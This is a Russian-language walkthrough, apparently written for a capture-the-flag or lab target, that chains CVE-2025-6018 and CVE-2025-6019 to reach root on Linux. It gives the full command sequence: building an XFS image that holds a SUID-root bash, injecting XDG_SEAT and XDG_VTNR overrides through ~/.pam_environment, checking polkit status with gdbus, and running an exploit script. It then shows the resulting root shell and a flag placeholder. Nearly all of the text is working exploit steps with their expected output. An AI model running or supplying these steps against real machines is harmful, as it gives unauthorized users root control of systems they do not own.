CVE-2025-6018 + CVE-2025-6019 Руководство по повышению привилегий
📋 Быстрые шаги эксплуатации
Шаг 1: Подготовка образа XFS (локальная машина)
# Создание образа XFS размером 300 МБ
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image
# Монтирование и установка SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt
# Проверка (должно отображаться 300M)
ls -lh xfs.image
Шаг 2: Загрузка файлов на цель
Шаг 3: Первый вход — настройка PAM
# Вход по SSH на цель
ssh [email protected]
# Запись переменных окружения PAM
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF
# Проверка конфигурации
cat ~/.pam_environment
# 🔥 Критично: Выйдите (для активации конфигурации PAM)
exit
Шаг 4: Второй вход — выполнение повышения привилегий
# Повторный вход по SSH (конфигурация PAM теперь активна)
ssh [email protected]
# Проверка активности PAM (должно вернуть "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
--object-path /org/freedesktop/login1 \
--method org.freedesktop.login1.Manager.CanReboot
# Запуск скрипта повышения привилегий
bash exp.sh
✅ Индикаторы успеха
Если эксплуатация прошла успешно, вы должны увидеть:
✓ SUID bash найден: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Доступ root подтвержден!
════════════════════════════════════════════════════════════
║ ФЛАГ ROOT ║
║ <flag_here> ║
════════════════════════════════════════════════════════════
bash-5.2# whoami
root
🔧 Устранение неполадок
| Проблема | Решение |
|---|
CanReboot возвращает |
📌 Ключевые моменты
- ✅ Необходимо выйти и войти снова: конфигурация PAM вступает в силу только в новых сессиях
- ✅ Проверьте CanReboot: убедитесь, что он возвращает
('yes',) перед запуском скрипта
- ✅ Используйте вход по SSH: не используйте выполнение в стиле
ssh -t user@host "cmd"
🐱 Кот-хранитель
Если не работает, убедитесь, что каждый шаг выполняется строго по порядку!